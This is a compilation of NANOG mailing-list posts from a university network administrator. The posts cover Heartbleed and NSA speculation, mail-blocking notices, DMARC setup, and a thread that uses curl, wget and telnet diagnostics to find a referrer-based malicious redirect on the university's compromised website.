To: Bengt Larsson
Cc: nanog@nanog.org
Subject: Re: [[Infowarrior] - NSA Said to Have Used Heartbleed Bug for Years]

> It's quite plausible that they watch the changes in open-source 
> projects to find bugs. They could do nice diffs and everything.

the point of open source is that the community is supposed to be doing this.  
we failed.

randy

RE: [[Infowarrior] - NSA Said to Have Used Heartbleed Bug for Years]

[Matthew Black]

Also on this same idea, in his book "The Puzzle Palace," James Bamford claims 
that we knew of the pending attack on Pearl Harbor but did nothing, because 
that would compromise we broke the Japanese Purple Cipher.

matthew black
california state university, long beach


-Original Message-
From: William Herrin [mailto:b...@herrin.us] 
Sent: Friday, April 11, 2014 2:06 PM
To: nanog@nanog.org
Subject: Re: [[Infowarrior] - NSA Said to Have Used Heartbleed Bug for Years]

On Fri, Apr 11, 2014 at 4:10 PM, Niels Bakker  wrote:
> Please go read up on some recent and less recent history before making 
> judgments on what would be unusually gutsy for that group of people.
>
> I'm not saying this has been happening but you will have to come up 
> with a better defense than "it seems unlikely to me personally".

Let me know when someone finds the second shooter on the grassy knoll.
As for me, I do have some first hand knowledge as to exactly how sensitive 
several portions of the federal government are to the security of the servers 
which hold their data. They may not hold YOUR data in high regard... but the 
word "sensitive" does not do justice to the attention lavished on THEIR 
servers' security.

In WW2 we protected the secret of having cracked enigma by deliberately 
ignoring a lot of the knowledge we gained. So such things have happened. But we 
didn't use enigma ourselves -- none of our secrets were at risk. And our 
adversaries today have no secrets more valuable than our own.

-Bill

RE: [[Infowarrior] - NSA Said to Have Used Heartbleed Bug for Years]

[Matthew Black]

IIRC, the message was sent via courier instead of cable or telephone to prevent 
interception. Did the military not even trust its own cryptographic methods? Or 
did they not think withdrawal of the Japanese ambassador was not very critical?

matthew black
california state university, long beach

From: Donald Eastlake [mailto:d3e...@gmail.com]
Sent: Monday, April 14, 2014 8:28 AM
To: Matthew Black
Cc: William Herrin; nanog@nanog.org
Subject: Re: [[Infowarrior] - NSA Said to Have Used Heartbleed Bug for Years]

Matthew,

On Mon, Apr 14, 2014 at 10:48 AM, Matthew Black 
mailto:matthew.bl...@csulb.edu>> wrote:
Also on this same idea, in his book "The Puzzle Palace," James Bamford claims 
that we knew of the pending attack on Pearl Harbor but did nothing, because 
that would compromise we broke the Japanese Purple Cipher.

I assume you refers to pages 36 through 39 of "The Puzzle Palace" which is 
almost entirely a recounting of bureaucratic fumbling and delay. The 
sensitivity of a Purple Cipher decode did cause the intercepted information to 
be sent by a less immediate means to the US Naval authorities in Hawaii. 
Nevertheless, it was sent with every expectation that those authorities would 
receive it before the time of the attack. We do not know what those authorities 
would have done it they had received the intercept information as expected, 
instead of receiving it about 6 hours after the first bomb struck Pearl Harbor. 
Your implication that Bamford says "we decided to do nothing" bears no 
relationship to what Bamford actually wrote.

Thanks,
Donald
=
 Donald E. Eastlake 3rd   +1-508-333-2270 (cell)
 155 Beaver Street, Milford, MA 01757 USA
 d3e...@gmail.com<mailto:d3e...@gmail.com>

matthew black
california state university, long beach


-Original Message-
From: William Herrin [mailto:b...@herrin.us<mailto:b...@herrin.us>]
Sent: Friday, April 11, 2014 2:06 PM
To: nanog@nanog.org<mailto:nanog@nanog.org>
Subject: Re: [[Infowarrior] - NSA Said to Have Used Heartbleed Bug for Years]

On Fri, Apr 11, 2014 at 4:10 PM, Niels Bakker 
mailto:na...@bakker.net>> wrote:
> Please go read up on some recent and less recent history before making
> judgments on what would be unusually gutsy for that group of people.
>
> I'm not saying this has been happening but you will have to come up
> with a better defense than "it seems unlikely to me personally".

Let me know when someone finds the second shooter on the grassy knoll.
As for me, I do have some first hand knowledge as to exactly how sensitive 
several portions of the federal government are to the security of the servers 
which hold their data. They may not hold YOUR data in high regard... but the 
word "sensitive" does not do justice to the attention lavished on THEIR 
servers' security.

In WW2 we protected the secret of having cracked enigma by deliberately 
ignoring a lot of the knowledge we gained. So such things have happened. But we 
didn't use enigma ourselves -- none of our secrets were at risk. And our 
adversaries today have no secrets more valuable than our own.

-Bill

RE: [[Infowarrior] - NSA Said to Have Used Heartbleed Bug for Years]

[Matthew Black]

From: Doug Barton [mailto:do...@dougbarton.us] 
> When you say "clear the disk allocated to programs" what do you mean
> exactly?

Seriously? When files are deleted, their sectors are simply released to the 
free space pool without erasing their contents. Allocation of disk sectors 
without clearing them gives users/programs access to file contents previously 
stored by other users/programs.

As to why this is a problem, well, as they write in some math textbooks, the 
answer is trivial and left as an exercise to the reader. Well, usually trivial.

matthew black
california state university, long beach


-Original Message-
From: Doug Barton [mailto:do...@dougbarton.us] 
Sent: Monday, April 14, 2014 7:48 PM
To: nanog@nanog.org
Subject: Re: [[Infowarrior] - NSA Said to Have Used Heartbleed Bug for Years]

On 04/14/2014 05:50 PM, John Levine wrote:
> In article <534c68f4@cox.net> you write:
>> On 4/14/2014 9:38 AM, Matthew Black wrote:
>>> Shouldn't a decent OS scrub RAM and disk sectors before allocating
>>> them to processes, unless that process enters processor privileged
>>> mode and sets a call flag? I recall digging through disk sectors on
>>> RSTS/E to look for passwords and other interesting stuff over 30
>>> years ago.
>>
>> I have been out of the loop for quite a while but my strongly held
>> belief is that such scrubbing would be an enormous (and intolerable)
>> overhead ...
>
> It must be quite a while.  Unix systems have routinely cleared the RAM
> and disk allocated to programs since the earliest days.

When you say "clear the disk allocated to programs" what do you mean 
exactly?

nanog@nanog.org

[Matthew Black]

Our university just received notice from AT&T that our e-mail is being blocked 
without much explanation. As all universities send e-mail to the students and 
employees, it is impossible to tell what triggered AT&T's actions.

Does anyone have an AT&T contact? If you are from AT&T, please contact me 
off-line.

Thanks.

matthew black
e-mail postmaster
california state university, long beach


-Original Message-
From: test_re...@att.net [mailto:test_re...@att.net] 
Sent: Wednesday, January 28, 2015 4:58 PM
Subject: Blocked Email Notification

Dear Postmaster:

We are writing to let you know that we are blocking messages addressed to one 
of our customers at the domain att.net by one of your customers at domain 
csulb.edu. The stream of messages coming from your system appears to consist 
mostly of unwanted commercial e-mail (UCE, or "spam"). To protect our system 
and to ensure that it operates well for all of our customers, we have decided 
to block all messages originating from your system.

Please consult your logs to see what might be causing this situation and how it 
can be fixed. Then visit http://rbl.att.net/block_inquiry.html to request a 
removal of the block. Most requests for removal are honored within two days.

The specific error message received by your customer was:
550 Error - Blocked for abuse. See http://att.net/blocks

Thank you for your assistance in helping our respective customers communicate.

Best regards,

The AT&T Mail Team.

Yahoo postmaster

[Matthew Black]

One of our user’s e-mail messages to Yahoo bounced with the following link for 
more information: http://postmaster.yahoo.com/errors/postmaster-27.html

which redirects to 
https://help.yahoo.com/kb/postmaster/SLN5067.html?impressions=true



That page contains a link to “Yahoo Mail and Yahoo Messenger Terms of Service”, 
which is broken!

http://https//info.yahoo.com/legal/us/yahoo/mail/en-us/<http://https/info.yahoo.com/legal/us/yahoo/mail/en-us/>

It redirects to an https link  saying, Server not found.



I hope someone from Yahoo can fix this.



matthew black

california state university, long beach

RE: Fixing Google geolocation screwups

[Matthew Black]

Pedro Cavaca suggests:
> https://support.google.com/websearch/answer/873?hl=en

Correct me if I'm wrong, that looks like Google simply saves location data in a 
browser cookie.

"A location helps Google find more relevant information when you use Search, 
Maps, and other Google products. Learn how Google saves location information on 
this computer."


matthew black
california state university, long beach


-Original Message-
From: NANOG [mailto:nanog-bounces+matthew.black=csulb@nanog.org] On Behalf 
Of Pedro Cavaca
Sent: Tuesday, April 07, 2015 3:41 PM
To: John Levine
Cc: NANOG Mailing List
Subject: Re: Fixing Google geolocation screwups

https://support.google.com/websearch/answer/873?hl=en


On 7 April 2015 at 23:26, John Levine  wrote:

> A friend of mine lives in Alabama and has business service from at&t.
> But Google thinks he's in France.  We've checked for various 
> possibilities of VPNs and proxies and such, and it's pretty clear that 
> the Goog's geolocation for addresses around 99.106.185.0/24 is screwed 
> up.  Bing and other services correctly find him in Alabama.
>
> Poking around I see lots of advice about how to use Google's 
> geolocation data, but nothing on how to update it.  Anyone know the 
> secret?  TIA
>
> Regards,
> John Levine, jo...@iecc.com, Primary Perpetrator of "The Internet for 
> Dummies", Please consider the environment before reading this e-mail. 
> http://jl.ly
>
>
>

RE: Google contact?

[Matthew Black]

Hopefully, they sent you advance notice.

Google Apps for ISP EOL
https://productforums.google.com/forum/#!topic/apps/_zgHXEBjwKU


matthew black
california state university, long beach


-Original Message-
From: NANOG [mailto:nanog-boun...@nanog.org] On Behalf Of Christopher Tyler
Sent: Wednesday, June 17, 2015 6:29 AM
To: nanog@nanog.org
Subject: Google contact?

Need some help.. Does anyone have an email contact at Google that they are 
willing to pass along?
All of our mowisp.net Apps for ISP accounts were disabled last night at about 
8-9PM without notice and we are now getting swamped with calls. Possibly 
several hundred users affected.

-- 
Christopher Tyler 
MTCRE/MTCNA/MTCTCE/MTCWE 
Total Highspeed Internet Services 
417.851.1107

DMARC in education

[Matthew Black]

Looking at implementing DMARC for my institution. We currently have an SPF 
record and use DKIM to sign a small subset of messages. Rollout recommendations 
for DMARC suggest initially creating a "p=none" record to gather information on 
how a domain is being used. The RUA tag specifies a URI of where to send daily 
reports.

Trying to get an idea of how many reports to expect a day or two after the dust 
settles. Does anyone use an aggregator to process their feedback (RUA tag) 
and/or forensic reports (RUF tag)?

DMARC information.
https://dmarc.org/


See slide 38 of 93 at 
http://www.slideshare.net/kka7/fighting-email-abuse-with-dmarc?qid=5e90be27-3fc0-41ed-9d71-253978cc6a12&v=default&b=&from_search=2

Everyone's first DMARC record
V=DMARC1; p=none; rua=mailto:aggreg...@example.com;


Cheers!

matthew black
information technology services
california state university, long beach

DNS poisoning at Google?

[Matthew Black]

Google Safe Browsing and Firefox have marked our website as containing malware. 
They claim our home page returns no results, but redirects users to another 
compromised website couchtarts.com.

We have thoroughly examined our root .htaccess and httpd.conf files and are not 
redirecting to the problem target site. No recent changes either.

We ran some NSLOOKUPs against various public DNS servers and intermittently get 
results that are NOT our servers.

We believe the DNS servers used by Google's crawler have been poisoned.

Can anyone shed some light on this?

matthew black
information technology services
california state university, long beach
www.csulb.edu<http://www.csulb.edu>

RE: DNS poisoning at Google?

[Matthew Black]

Running Apache on three Solaris webservers behind a load balancer. No MS 
Windows!

Not sure how malicious software could get between our load balancer and Unix 
servers. Thanks for the tip!

matthew black
information technology services
california state university, long beach



From: Landon Stewart [mailto:lstew...@superb.net]
Sent: Tuesday, June 26, 2012 9:07 PM
To: Matthew Black
Cc: nanog@nanog.org
Subject: Re: DNS poisoning at Google?

Is it possible that some malicious software is listening and injecting a 
redirect on the wire?  We've seen this before with a Windows machine being 
infected.
On 26 June 2012 20:53, Matthew Black 
mailto:matthew.bl...@csulb.edu>> wrote:
Google Safe Browsing and Firefox have marked our website as containing malware. 
They claim our home page returns no results, but redirects users to another 
compromised website couchtarts.com<http://couchtarts.com>.

We have thoroughly examined our root .htaccess and httpd.conf files and are not 
redirecting to the problem target site. No recent changes either.

We ran some NSLOOKUPs against various public DNS servers and intermittently get 
results that are NOT our servers.

We believe the DNS servers used by Google's crawler have been poisoned.

Can anyone shed some light on this?

matthew black
information technology services
california state university, long beach
www.csulb.edu<http://www.csulb.edu><http://www.csulb.edu>



--
Landon Stewart mailto:lstew...@superb.net>>
Sr. Administrator
Systems Engineering
Superb Internet Corp - 888-354-6128 x 4199
Web hosting and more "Ahead of the Rest": 
http://www.superbhosting.net<http://www.superbhosting.net/>

RE: DNS poisoning at Google?

[Matthew Black]

Running Apache on three Solaris servers behind a load balancer.

I forgot how to lookup our AS number to see if it matches couchtarts.

matthew black
information technology services
california state university, long beach


-Original Message-
From: David Hubbard [mailto:dhubb...@dino.hostasaurus.com] 
Sent: Tuesday, June 26, 2012 9:14 PM
To: nanog@nanog.org
Subject: RE: DNS poisoning at Google?

Typically if google were pulling your site sometimes from the wrong IP, their 
safe browsing page should indicate it being on another AS number in addition to 
the correct one 2152:

http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http
://www.csulb.edu

For example, the couchtarts site they claim yours is redirecting to:

http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http
://www.couchtarts.com

That site's DNS is screwed up and some requests are sent to a different IP at a 
different host, so Google picked up both AS numbers.

Could one of your domain's subdomains be what is actually infected?  You seem 
to have a bunch of them, maybe google is penalizing the whole domain over a 
subdomain?  Not sure if they do that or not.

If your sites are running off of an application like wordpress, etc., you may 
not get the same page that google gets and the application may have been hacked.
Here's a wget command you can use to make requests to your site pretending to 
be google:

wget -c \
--user-agent="Mozilla/5.0 (compatible; Googlebot/2.1;
+http://www.google.com/bot.html)" \
--output-document=googlebot.html 'http://www.csulb.edu'

nanog will probably line wrap that user agent line making it not correct so 
you'll have to put it back together correctly.  It will save the output to a 
file named googlebot.html you can look at to see if anything weird ends up 
being served.

David


> -Original Message-
> From: Matthew Black [mailto:matthew.bl...@csulb.edu]
> Sent: Tuesday, June 26, 2012 11:53 PM
> To: nanog@nanog.org
> Subject: DNS poisoning at Google?
> 
> Google Safe Browsing and Firefox have marked our website as containing 
> malware. They claim our home page returns no results, but redirects 
> users to another compromised website couchtarts.com.
> 
> We have thoroughly examined our root .htaccess and httpd.conf files 
> and are not redirecting to the problem target site. No recent changes 
> either.
> 
> We ran some NSLOOKUPs against various public DNS servers and 
> intermittently get results that are NOT our servers.
> 
> We believe the DNS servers used by Google's crawler have been 
> poisoned.
> 
> Can anyone shed some light on this?
> 
> matthew black
> information technology services
> california state university, long beach 
> www.csulb.edu<http://www.csulb.edu>
> 
> 
> 

RE: DNS poisoning at Google?

[Matthew Black]

Yes, we’ve used the Google Webmaster Tools a lot today. Submitted multiple 
requests and they keep insisting that our site issues a redirect. Unable to 
duplicate the problem here.

matthew black
information technology services
california state university, long beach

From: Ishmael Rufus [mailto:sakam...@gmail.com]
Sent: Tuesday, June 26, 2012 9:34 PM
To: Matthew Black
Cc: David Hubbard; nanog@nanog.org
Subject: Re: DNS poisoning at Google?

Have you tried using Google Webmaster tools?
On Tue, Jun 26, 2012 at 11:28 PM, Matthew Black 
mailto:matthew.bl...@csulb.edu>> wrote:
Running Apache on three Solaris servers behind a load balancer.

I forgot how to lookup our AS number to see if it matches couchtarts.

matthew black
information technology services
california state university, long beach

-Original Message-
From: David Hubbard 
[mailto:dhubb...@dino.hostasaurus.com<mailto:dhubb...@dino.hostasaurus.com>]
Sent: Tuesday, June 26, 2012 9:14 PM
To: nanog@nanog.org<mailto:nanog@nanog.org>
Subject: RE: DNS poisoning at Google?

Typically if google were pulling your site sometimes from the wrong IP, their 
safe browsing page should indicate it being on another AS number in addition to 
the correct one 2152:

http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http
://www.csulb.edu<http://www.csulb.edu>

For example, the couchtarts site they claim yours is redirecting to:

http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http
://www.couchtarts.com<http://www.couchtarts.com>

That site's DNS is screwed up and some requests are sent to a different IP at a 
different host, so Google picked up both AS numbers.

Could one of your domain's subdomains be what is actually infected?  You seem 
to have a bunch of them, maybe google is penalizing the whole domain over a 
subdomain?  Not sure if they do that or not.

If your sites are running off of an application like wordpress, etc., you may 
not get the same page that google gets and the application may have been hacked.
Here's a wget command you can use to make requests to your site pretending to 
be google:

wget -c \
--user-agent="Mozilla/5.0 (compatible; Googlebot/2.1;
+http://www.google.com/bot.html)" \
--output-document=googlebot.html 'http://www.csulb.edu'

nanog will probably line wrap that user agent line making it not correct so 
you'll have to put it back together correctly.  It will save the output to a 
file named googlebot.html you can look at to see if anything weird ends up 
being served.

David


> -Original Message-
> From: Matthew Black 
> [mailto:matthew.bl...@csulb.edu<mailto:matthew.bl...@csulb.edu>]
> Sent: Tuesday, June 26, 2012 11:53 PM
> To: nanog@nanog.org<mailto:nanog@nanog.org>
> Subject: DNS poisoning at Google?
>
> Google Safe Browsing and Firefox have marked our website as containing
> malware. They claim our home page returns no results, but redirects
> users to another compromised website couchtarts.com<http://couchtarts.com>.
>
> We have thoroughly examined our root .htaccess and httpd.conf files
> and are not redirecting to the problem target site. No recent changes
> either.
>
> We ran some NSLOOKUPs against various public DNS servers and
> intermittently get results that are NOT our servers.
>
> We believe the DNS servers used by Google's crawler have been
> poisoned.
>
> Can anyone shed some light on this?
>
> matthew black
> information technology services
> california state university, long beach
> www.csulb.edu<http://www.csulb.edu><http://www.csulb.edu>
>
>
>

RE: DNS poisoning at Google?

[Matthew Black]

Q:have you consulted the logs?

Seriously? Our servers have multiple log files due to multiple virtual hosts. 
Our primary domain log file on just one server has over 600,000 records x 3 
servers.

Probably over 100,000 304 redirects in our logs.

couchtarts.com does not appear in our log files.


matthew black
information technology services
california state university, long beach

-Original Message-
From: Michael J Wise [mailto:mjw...@kapu.net] 
Sent: Tuesday, June 26, 2012 9:56 PM
To: Matthew Black
Cc: nanog@nanog.org
Subject: Re: DNS poisoning at Google?


On Jun 26, 2012, at 9:35 PM, Matthew Black wrote:

> Yes, we've used the Google Webmaster Tools a lot today. Submitted multiple 
> requests and they keep insisting that our site issues a redirect. Unable to 
> duplicate the problem here.

... have you consulted the logs?
If the redirect is there, it ... 1) might not be from the home page, and 2) 
could be in ... user content?

awk '{if ($9 ~ /304/) { print $0 }}' access_log.
... or some such.
Granted, might be a storm of " " -> index.html redirects, but they should be 
grep -v 'able in short order.
You might also look for the rDNS of the Google spider to see exactly where it 
is looking, and what it sees.

Aloha,
Michael.
-- 
"Please have your Internet License 
 and Usenet Registration handy..."

RE: DNS poisoning at Google?

[Matthew Black]

Google Webtools reports a problem with our HOMEPAGE "/". That page is not 
redirecting anywhere.
They also report problems with some 48 other primary sites, none of which 
redirect to the offending couchtarts.

matthew black
information technology services
california state university, long beach





-Original Message-
From: Jeremy Hanmer [mailto:jeremy.han...@dreamhost.com] 
Sent: Tuesday, June 26, 2012 9:58 PM
To: Matthew Black
Cc: nanog@nanog.org
Subject: Re: DNS poisoning at Google?

It's not DNS.  If you're sure there's no htaccess files in place, check your 
content (even that stored in a database) for anything that might be altering 
data based on referrer.  This simple test shows what I mean:

Airy:~ user$ curl -e 'http://google.com' csulb.edu  
301 Moved Permanently

Moved Permanently
The document has moved http://www.couchtarts.com/media.php";>here.


Running curl without the -e argument gives the proper site contents.  

On Jun 26, 2012, at 9:24 PM, Matthew Black  wrote:

> Running Apache on three Solaris webservers behind a load balancer. No MS 
> Windows!
> 
> Not sure how malicious software could get between our load balancer and Unix 
> servers. Thanks for the tip!
> 
> matthew black
> information technology services
> california state university, long beach
> 
> 
> 
> From: Landon Stewart [mailto:lstew...@superb.net]
> Sent: Tuesday, June 26, 2012 9:07 PM
> To: Matthew Black
> Cc: nanog@nanog.org
> Subject: Re: DNS poisoning at Google?
> 
> Is it possible that some malicious software is listening and injecting a 
> redirect on the wire?  We've seen this before with a Windows machine being 
> infected.
> On 26 June 2012 20:53, Matthew Black 
> mailto:matthew.bl...@csulb.edu>> wrote:
> Google Safe Browsing and Firefox have marked our website as containing 
> malware. They claim our home page returns no results, but redirects users to 
> another compromised website couchtarts.com<http://couchtarts.com>.
> 
> We have thoroughly examined our root .htaccess and httpd.conf files and are 
> not redirecting to the problem target site. No recent changes either.
> 
> We ran some NSLOOKUPs against various public DNS servers and intermittently 
> get results that are NOT our servers.
> 
> We believe the DNS servers used by Google's crawler have been poisoned.
> 
> Can anyone shed some light on this?
> 
> matthew black
> information technology services
> california state university, long beach 
> www.csulb.edu<http://www.csulb.edu><http://www.csulb.edu>
> 
> 
> 
> --
> Landon Stewart mailto:lstew...@superb.net>>
> Sr. Administrator
> Systems Engineering
> Superb Internet Corp - 888-354-6128 x 4199 Web hosting and more "Ahead 
> of the Rest": 
> http://www.superbhosting.net<http://www.superbhosting.net/>
> 

RE: DNS poisoning at Google?

[Matthew Black]

I'm not familiar with curl and don't understand what I type and what are 
results. Are you suggesting that when google refers to our website, we pick 
that up and redirect to couchtarts?

matthew black
information technology services
california state university, long beach




-Original Message-
From: Jeremy Hanmer [mailto:jer...@hq.newdream.net] 
Sent: Tuesday, June 26, 2012 9:59 PM
To: Matthew Black
Cc: nanog@nanog.org
Subject: Re: DNS poisoning at Google?

It's not DNS.  If you're sure there's no htaccess files in place, check your 
content (even that stored in a database) for anything that might be altering 
data based on referrer.  This simple test shows what I mean:

Airy:~ user$ curl -e 'http://google.com' csulb.edu  
301 Moved Permanently

Moved Permanently
The document has moved http://www.couchtarts.com/media.php";>here.


Running curl without the -e argument gives the proper site contents.  

On Jun 26, 2012, at 9:35 PM, Matthew Black  wrote:

> Yes, we've used the Google Webmaster Tools a lot today. Submitted multiple 
> requests and they keep insisting that our site issues a redirect. Unable to 
> duplicate the problem here.
> 
> matthew black
> information technology services
> california state university, long beach
> 
> From: Ishmael Rufus [mailto:sakam...@gmail.com]
> Sent: Tuesday, June 26, 2012 9:34 PM
> To: Matthew Black
> Cc: David Hubbard; nanog@nanog.org
> Subject: Re: DNS poisoning at Google?
> 
> Have you tried using Google Webmaster tools?
> On Tue, Jun 26, 2012 at 11:28 PM, Matthew Black 
> mailto:matthew.bl...@csulb.edu>> wrote:
> Running Apache on three Solaris servers behind a load balancer.
> 
> I forgot how to lookup our AS number to see if it matches couchtarts.
> 
> matthew black
> information technology services
> california state university, long beach
> 
> -Original Message-
> From: David Hubbard 
> [mailto:dhubb...@dino.hostasaurus.com<mailto:dhubbard@dino.hostasaurus
> .com>]
> Sent: Tuesday, June 26, 2012 9:14 PM
> To: nanog@nanog.org<mailto:nanog@nanog.org>
> Subject: RE: DNS poisoning at Google?
> 
> Typically if google were pulling your site sometimes from the wrong IP, their 
> safe browsing page should indicate it being on another AS number in addition 
> to the correct one 2152:
> 
> http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=ht
> tp ://www.csulb.edu<http://www.csulb.edu>
> 
> For example, the couchtarts site they claim yours is redirecting to:
> 
> http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=ht
> tp ://www.couchtarts.com<http://www.couchtarts.com>
> 
> That site's DNS is screwed up and some requests are sent to a different IP at 
> a different host, so Google picked up both AS numbers.
> 
> Could one of your domain's subdomains be what is actually infected?  You seem 
> to have a bunch of them, maybe google is penalizing the whole domain over a 
> subdomain?  Not sure if they do that or not.
> 
> If your sites are running off of an application like wordpress, etc., you may 
> not get the same page that google gets and the application may have been 
> hacked.
> Here's a wget command you can use to make requests to your site pretending to 
> be google:
> 
> wget -c \
> --user-agent="Mozilla/5.0 (compatible; Googlebot/2.1;
> +http://www.google.com/bot.html)" \
> --output-document=googlebot.html 'http://www.csulb.edu'
> 
> nanog will probably line wrap that user agent line making it not correct so 
> you'll have to put it back together correctly.  It will save the output to a 
> file named googlebot.html you can look at to see if anything weird ends up 
> being served.
> 
> David
> 
> 
>> -Original Message-
>> From: Matthew Black 
>> [mailto:matthew.bl...@csulb.edu<mailto:matthew.bl...@csulb.edu>]
>> Sent: Tuesday, June 26, 2012 11:53 PM
>> To: nanog@nanog.org<mailto:nanog@nanog.org>
>> Subject: DNS poisoning at Google?
>> 
>> Google Safe Browsing and Firefox have marked our website as 
>> containing malware. They claim our home page returns no results, but 
>> redirects users to another compromised website 
>> couchtarts.com<http://couchtarts.com>.
>> 
>> We have thoroughly examined our root .htaccess and httpd.conf files 
>> and are not redirecting to the problem target site. No recent changes 
>> either.
>> 
>> We ran some NSLOOKUPs against various public DNS servers and 
>> intermittently get results that are NOT our servers.
>> 
>> We believe the DNS servers used by Google's crawler have been 
>> poisoned.
>> 
>> Can anyone shed some light on this?
>> 
>> matthew black
>> information technology services
>> california state university, long beach 
>> www.csulb.edu<http://www.csulb.edu><http://www.csulb.edu>
>> 
>> 
>> 
> 
> 
> 
> 

RE: DNS poisoning at Google?

[Matthew Black]

Thank you for that helpful instruction!

curl doesn't work because our webserver is firewalled against outbound traffic. 
The telnet to port 80 showed me the problem. I also didn't understand when 
output was placed at the end of the command line, instead of starting on the 
next line...that looked like something I was supposed to type.


matthew black
information technology services
california state university, long beac

-Original Message-
From: christopher.mor...@gmail.com [mailto:christopher.mor...@gmail.com] On 
Behalf Of Christopher Morrow
Sent: Tuesday, June 26, 2012 10:17 PM
To: Ishmael Rufus
Cc: Matthew Black; nanog@nanog.org; Jeremy Hanmer
Subject: Re: DNS poisoning at Google?

for example, from the commandline with telnet:

morrowc@teensy:~$ telnet www.csulb.edu 80 Trying 134.139.1.60...
Connected to gaggle.its.csulb.edu.
Escape character is '^]'.
GET / HTTP/1.0
Host: www.csulb.edu
Referer: http://www.google.com/



HTTP/1.1 301 Moved Permanently
Date: Wed, 27 Jun 2012 05:04:04 GMT
Server: Apache/2.0.63
Location: http://www.couchtarts.com/media.php
Content-Length: 243
Connection: close
Content-Type: text/html; charset=iso-8859-1

 
301 Moved Permanently

Moved Permanently
The document has moved http://www.couchtarts.com/media.php";>here.

Connection closed by foreign host.


oops :( fail.

On Wed, Jun 27, 2012 at 1:13 AM, Ishmael Rufus  wrote:
> Invoking the referrer on your site recommends a redirect to 
> couchtarts. I agree with Jeremy and Jeff check your htaccess files, 
> conf files and anything that  calls RewriteCond or Rewrite
>
> On Wed, Jun 27, 2012 at 12:05 AM, Matthew Black 
> wrote:
>
>> Google Webtools reports a problem with our HOMEPAGE "/". That page is 
>> not redirecting anywhere.
>> They also report problems with some 48 other primary sites, none of 
>> which redirect to the offending couchtarts.
>>
>> matthew black
>> information technology services
>> california state university, long beach
>>
>>
>>
>>
>>
>> -Original Message-
>> From: Jeremy Hanmer [mailto:jeremy.han...@dreamhost.com]
>> Sent: Tuesday, June 26, 2012 9:58 PM
>> To: Matthew Black
>> Cc: nanog@nanog.org
>> Subject: Re: DNS poisoning at Google?
>>
>> It's not DNS.  If you're sure there's no htaccess files in place, 
>> check your content (even that stored in a database) for anything that 
>> might be altering data based on referrer.  This simple test shows what I 
>> mean:
>>
>> Airy:~ user$ curl -e 'http://google.com' csulb.edu > PUBLIC "-//IETF//DTD HTML 2.0//EN"> 
>> 301 Moved Permanently
>> 
>> Moved Permanently
>> The document has moved > href="http://www.couchtarts.com/media.php
>> ">here.
>> 
>>
>> Running curl without the -e argument gives the proper site contents.
>>
>> On Jun 26, 2012, at 9:24 PM, Matthew Black 
>> wrote:
>>
>> > Running Apache on three Solaris webservers behind a load balancer. 
>> > No MS
>> Windows!
>> >
>> > Not sure how malicious software could get between our load balancer 
>> > and
>> Unix servers. Thanks for the tip!
>> >
>> > matthew black
>> > information technology services
>> > california state university, long beach
>> >
>> >
>> >
>> > From: Landon Stewart [mailto:lstew...@superb.net]
>> > Sent: Tuesday, June 26, 2012 9:07 PM
>> > To: Matthew Black
>> > Cc: nanog@nanog.org
>> > Subject: Re: DNS poisoning at Google?
>> >
>> > Is it possible that some malicious software is listening and 
>> > injecting a
>> redirect on the wire?  We've seen this before with a Windows machine 
>> being infected.
>> > On 26 June 2012 20:53, Matthew Black > matthew.bl...@csulb.edu>> wrote:
>> > Google Safe Browsing and Firefox have marked our website as 
>> > containing
>> malware. They claim our home page returns no results, but redirects 
>> users to another compromised website couchtarts.com<http://couchtarts.com>.
>> >
>> > We have thoroughly examined our root .htaccess and httpd.conf files 
>> > and
>> are not redirecting to the problem target site. No recent changes either.
>> >
>> > We ran some NSLOOKUPs against various public DNS servers and
>> intermittently get results that are NOT our servers.
>> >
>> > We believe the DNS servers used by Google's crawler have been poisoned.
>> >
>> > Can anyone shed some light on this?
>> >
>> > matthew black
>> > information technology services
>> > california state university, long beach 
>> > www.csulb.edu<http://www.csulb.edu><http://www.csulb.edu>
>> >
>> >
>> >
>> > --
>> > Landon Stewart mailto:lstew...@superb.net>>
>> > Sr. Administrator
>> > Systems Engineering
>> > Superb Internet Corp - 888-354-6128 x 4199 Web hosting and more 
>> > "Ahead of the Rest":
>> > http://www.superbhosting.net<http://www.superbhosting.net/>
>> >
>>
>>
>>
>>
>>

RE: DNS poisoning at Google?

[Matthew Black]

Yes, thanks. I'll have to read up on that.

My e-mail was showing extra stuff at the end of the sample command lines, which 
confused me:

Airy:~ user$ curl -e 'http://google.com' csulb.edu  
...###

Sigh, I just Outlook not to strip extra line breaks.


matthew black
information technology services
california state university, long beach



-Original Message-
From: John Levine [mailto:jo...@iecc.com] 
Sent: Tuesday, June 26, 2012 10:30 PM
To: nanog@nanog.org
Cc: Matthew Black
Subject: Re: DNS poisoning at Google?

In article 
 you 
write:
>I'm not familiar with curl and don't understand what I type and what 
>are results. Are you suggesting that when google refers to our website, we 
>pick that up and redirect to couchtarts?

curl is a command line www client that's worth knowing about.

And I observe the same thing, using my own local DNS cache -- if I fetch the 
home page from csulb.edu or www.csulb.edu with Google as the referrer, it 
returns a page that redirects to couchtarts.

Sorry, dude, you've been pwn3d.

R's,
John


>Airy:~ user$ curl -e 'http://google.com' csulb.edu PUBLIC "-//IETF//DTD HTML 2.0//EN"> 
>301 Moved Permanently
>
>Moved Permanently
>The document has moved href="http://www.couchtarts.com/media.php";>here.
>

RE: DNS poisoning at Google?

[Matthew Black]

Thanks again to everyone who helped. I didn't know what to enter with curl, 
because Outlook clobbered the line breaks in Jeremy's original message.

Also, curl failed on our primary webserver because of firewall and load 
balancer magic settings. The Telnet method worked better!

Our team is now scouring for that hidden redirect to couchtarts.

matthew black
information technology services
california state university, long beach



From: Landon Stewart [mailto:lstew...@superb.net]
Sent: Tuesday, June 26, 2012 10:37 PM
To: Matthew Black
Cc: Jeremy Hanmer; nanog@nanog.org
Subject: Re: DNS poisoning at Google?

There is definitely a 301 redirect.

$ curl -I --referer http://www.google.com/ http://www.csulb.edu/
HTTP/1.1 301 Moved Permanently
Date: Wed, 27 Jun 2012 05:36:31 GMT
Server: Apache/2.0.63
Location: http://www.couchtarts.com/media.php
Connection: close
Content-Type: text/html; charset=iso-8859-1

On 26 June 2012 22:05, Matthew Black 
mailto:matthew.bl...@csulb.edu>> wrote:
Google Webtools reports a problem with our HOMEPAGE "/". That page is not 
redirecting anywhere.
